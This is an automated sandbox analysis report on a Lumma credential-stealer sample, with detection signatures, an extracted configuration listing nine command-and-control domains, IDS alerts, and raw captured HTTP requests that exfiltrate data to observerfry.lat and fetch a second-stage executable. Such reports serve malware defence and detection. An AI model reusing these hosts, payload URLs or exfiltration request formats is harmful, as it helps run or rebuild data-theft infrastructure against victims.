Edit tour

Windows Analysis Report
OtHVIQ2ge4.exe

Overview

General Information

Sample name:	OtHVIQ2ge4.exe renamed because original name is a hash value
Original sample name:	4ba0641b1f9224605df854c9baaa5dcf.exe
Analysis ID:	1579973
MD5:	4ba0641b1f9224605df854c9baaa5dcf
SHA1:	386655601ba905a637b7a8a37d031f087fd66f3c
SHA256:	7cadf23c992d86cba2587cdf6ddccc39a0d72deb6eef34eb64aae0c097e2f54a
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected potential crypto function

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

OtHVIQ2ge4.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\OtHVIQ2ge4.exe" MD5: 4BA0641B1F9224605DF854C9BAAA5DCF)

WerFault.exe (PID: 5340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "tentabatte.lat", "talkynicer.lat", "observerfry.lat", "slipperyloo.lat", "bashfulacid.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:20:56.264024+0100	2028371	3	Unknown Traffic	192.168.2.9	49717	104.21.36.201	443	TCP
2024-12-23T17:20:58.221530+0100	2028371	3	Unknown Traffic	192.168.2.9	49723	104.21.36.201	443	TCP
2024-12-23T17:21:01.343367+0100	2028371	3	Unknown Traffic	192.168.2.9	49729	104.21.36.201	443	TCP
2024-12-23T17:21:03.705955+0100	2028371	3	Unknown Traffic	192.168.2.9	49735	104.21.36.201	443	TCP
2024-12-23T17:21:06.471599+0100	2028371	3	Unknown Traffic	192.168.2.9	49741	104.21.36.201	443	TCP
2024-12-23T17:21:08.970444+0100	2028371	3	Unknown Traffic	192.168.2.9	49747	104.21.36.201	443	TCP
2024-12-23T17:21:11.861870+0100	2028371	3	Unknown Traffic	192.168.2.9	49759	104.21.36.201	443	TCP
2024-12-23T17:21:17.048269+0100	2028371	3	Unknown Traffic	192.168.2.9	49770	104.21.36.201	443	TCP
2024-12-23T17:21:19.529477+0100	2028371	3	Unknown Traffic	192.168.2.9	49776	185.166.143.49	443	TCP
2024-12-23T17:21:22.009924+0100	2028371	3	Unknown Traffic	192.168.2.9	49783	52.217.75.84	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:20:56.994147+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49717	104.21.36.201	443	TCP
2024-12-23T17:20:59.644133+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49723	104.21.36.201	443	TCP
2024-12-23T17:21:17.805059+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49770	104.21.36.201	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:20:56.994147+0100	2049836	1	A Network Trojan was detected	192.168.2.9	49717	104.21.36.201	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:20:59.644133+0100	2049812	1	A Network Trojan was detected	192.168.2.9	49723	104.21.36.201	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:21:02.342460+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	49729	104.21.36.201	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:21:11.866061+0100	2843864	1	A Network Trojan was detected	192.168.2.9	49759	104.21.36.201	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: OtHVIQ2ge4.exe

Avira: detected

Found malware configuration

Source: OtHVIQ2ge4.exe.7832.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "tentabatte.lat", "talkynicer.lat", "observerfry.lat", "slipperyloo.lat", "bashfulacid.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: OtHVIQ2ge4.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: OtHVIQ2ge4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: OtHVIQ2ge4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.75.84:443 -> 192.168.2.9:49783 version: TLS 1.2

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Directory queried: number of queries: 1001

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49729 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49770 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49759 -> 104.21.36.201:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: curverpluch.lat

Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View	IP Address: 104.21.36.201 104.21.36.201

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49741 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49747 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49759 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49770 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49735 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49729 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49783 -> 52.217.75.84:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E2DQ77VNGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12797Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IM0Z09FOGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15015Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ICQWIJFXDT77D23LZB4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20591Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=90V9QFL94GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1180Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P5UKJIKOWJM3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584761Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat

Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe8
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exer
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001741000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515380529.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1533192683.000000000170B000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
